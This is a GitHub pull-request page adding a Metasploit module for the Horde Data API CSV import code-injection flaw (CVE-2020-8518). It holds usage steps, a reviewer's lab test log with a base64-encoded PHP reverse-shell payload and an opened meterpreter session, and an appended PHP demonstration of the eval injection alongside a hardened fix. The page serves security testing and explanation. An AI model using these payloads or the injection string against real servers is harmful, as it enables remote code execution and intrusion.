Add 'Horde CSV import arbitrary PHP code execution' (CVE-2020-8518)#13082

Merged
space-r7 merged 7 commits into
rapid7:masterfrom
cyrus-and:horde_csv_rce
Mar 23, 2020

Conversation

@cyrus-and
Contributor

This adds a module for the vulnerability named in the title. An excerpt from the documentation follows.

Vulnerable Application

The Horde project comprises several standalone applications and libraries. The Horde Groupware Webmail Edition suite (tested version 5.2.22) bundles several of them by default; among those, Data (Horde Data API) is a library used to manage data import/export in several formats, e.g., CSV, iCalendar, vCard, etc. This library, up to and including version 2.1.4, is vulnerable to PHP code injection.

Find more information in the original advisory.

Verification Steps

  1. Install the application (see below)
  2. Start msfconsole
  3. Do: use exploit/multi/http/horde_csv_rce
  4. Do: set payload php/meterpreter/reverse_tcp
  5. Do: set lhost [ATTACKER IP]
  6. Do: set rhost [TARGET IP]
  7. Do: set username [username]
  8. Do: set password [password]
  9. Do: exploit
  10. A session should open

Downgrade the Horde Data API package if needed:

pear uninstall --ignore-errors horde/horde_data-2.1.5
pear install --ignore-errors horde/horde_data-2.1.4

This is my first MSF module submission, I apologize if something's wrong or missing.


@space-r7 space-r7 left a comment

Hi @cyrus-and, thank you for submitting your module! I have a few comments that are mostly based on style.

Comment thread modules/exploits/multi/http/horde_csv_rce.rb Outdated
cyrus-and and others added 5 commits March 17, 2020 18:57
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
@cyrus-and
Contributor Author

Hi @cyrus-and, thank you for submitting your module!

Thanks for the review!

Feel free to eventually squash all the commits, I took advantage of the GitHub interface to accept your proposed changes.

@space-r7 space-r7 self-assigned this Mar 18, 2020
@space-r7
Contributor

Had a few issues getting the software installed, but finally got to test:

msf5 > use exploit/multi/http/horde_csv_rce
msf5 exploit(multi/http/horde_csv_rce) > set rhosts 172.16.215.227
rhosts => 172.16.215.227
msf5 exploit(multi/http/horde_csv_rce) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/http/horde_csv_rce) > set username blah
username => blah
msf5 exploit(multi/http/horde_csv_rce) > set password password
password => password
msf5 exploit(multi/http/horde_csv_rce) > set verbose true
verbose => true
msf5 exploit(multi/http/horde_csv_rce) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Logged in as blah:password
[*] Uploading jbKQiLUt.csv
[+] CSV file uploaded
[*] Sending payload: eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNi4yMTUuMSc7ICRwb3J0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFjaygi[...truncated...]))
[*] Sending stage (38288 bytes) to 172.16.215.227
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.227:48144) at 2020-03-23 07:27:20 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux

I also changed a few things: randomized the uploaded file, added a vprint_status statement, and removed the threading part. I haven't had any issues testing, but we can add that back if it is necessary for something I'm not seeing.

space-r7 added a commit that referenced this pull request Mar 23, 2020
@space-r7 space-r7 merged commit 40d6dd1 into rapid7:master Mar 23, 2020
@space-r7
Contributor

space-r7 commented Mar 23, 2020

Release Notes

An exploit module is available for the Horde Data API that gets bundled with software such as Horde Groupware Webmail Edition Suite. The Horde Data API up to and including v2.1.4 has functionality to handle importing/exporting data such as CSV files, but fails to properly escape strings while parsing the data. An authenticated user can gain code execution by uploading a CSV file and submitting the payload in the quote parameter of a POST request to mnemo/data.php.
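The release note above describes the bug class, but the page does not reproduce the Horde_Data source. The following PHP is an added illustration, not Horde's code and not the Metasploit module: a user-chosen `quote` import option is concatenated into PHP source that is then compiled, shown beside the closure-based form that keeps the value as data. The function names, the sample row and the `$GLOBALS['pwned']` marker are all constructed for this example and are assumptions, not identifiers from Horde.

```php
<?php
declare(strict_types=1);

// Constructed illustration of the bug class described in the release note
// (CVE-2020-8518): a `quote` option chosen by the user is concatenated into
// PHP source that is then compiled. This is NOT the Horde_Data source; it
// only models the pattern and its fix.

// Vulnerable: the quote character becomes part of the code string. The
// surrounding double quotes are the only "escaping", so a value containing
// `"` terminates the literal and everything after it is parsed as PHP.
function vulnerable_trim_row(array $row, string $quote): array
{
    $code = '$trimmed = trim($a, "' . $quote . '"); return $trimmed;';
    return array_map(function (string $a) use ($code) {
        return eval($code);   // $a is in scope for the eval'd code
    }, $row);
}

// Hardened: the value is captured by a closure and only ever used as data.
// Nothing is compiled at runtime, so no escaping is needed at all.
function hardened_trim_row(array $row, string $quote): array
{
    return array_map(fn(string $a): string => trim($a, $quote), $row);
}

// Constructed sample row, as a CSV splitter would hand it over.
$row = ['"alice"', '"alice@example.com"'];

// Benign quote character: both variants strip it from every field.
var_dump(vulnerable_trim_row($row, '"') === ['alice', 'alice@example.com']);
var_dump(hardened_trim_row($row, '"') === ['alice', 'alice@example.com']);

// Malicious value: close the string literal and the trim() call, inject a
// statement of our own, then reopen a matching call so the remainder of the
// generated code still parses. A real payload would put a reverse shell
// where the $GLOBALS assignment is; the marker just proves execution.
$GLOBALS['pwned'] = false;
$evil = '"); $GLOBALS["pwned"] = true; $ignored = trim($a, "';
vulnerable_trim_row($row, $evil);
var_dump($GLOBALS['pwned']);   // true only if the injected statement ran

// The closure version treats the same bytes as a list of characters to strip.
$GLOBALS['pwned'] = false;
hardened_trim_row($row, $evil);
var_dump($GLOBALS['pwned']);   // stays false: the value never became code
```

Run it with `php example.php`. With the malicious value, the generated source inside `vulnerable_trim_row` reads `$trimmed = trim($a, ""); $GLOBALS["pwned"] = true; $ignored = trim($a, ""); return $trimmed;`, which is why the injected statement executes before the original `return`. Escaping `"` in the option would be a weaker fix than the closure: the hardened form removes the runtime compilation step entirely, which is the property a reviewer should look for when checking a patch for this class of bug.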

@cyrus-and
Contributor Author

Had a few issues getting the software installed

Thank you! Installing Horde from scratch is not the most pleasant thing to do...

@tdoan-r7 tdoan-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 1, 2020

Labels

docs module rn-modules release notes for new or majorly enhanced modules
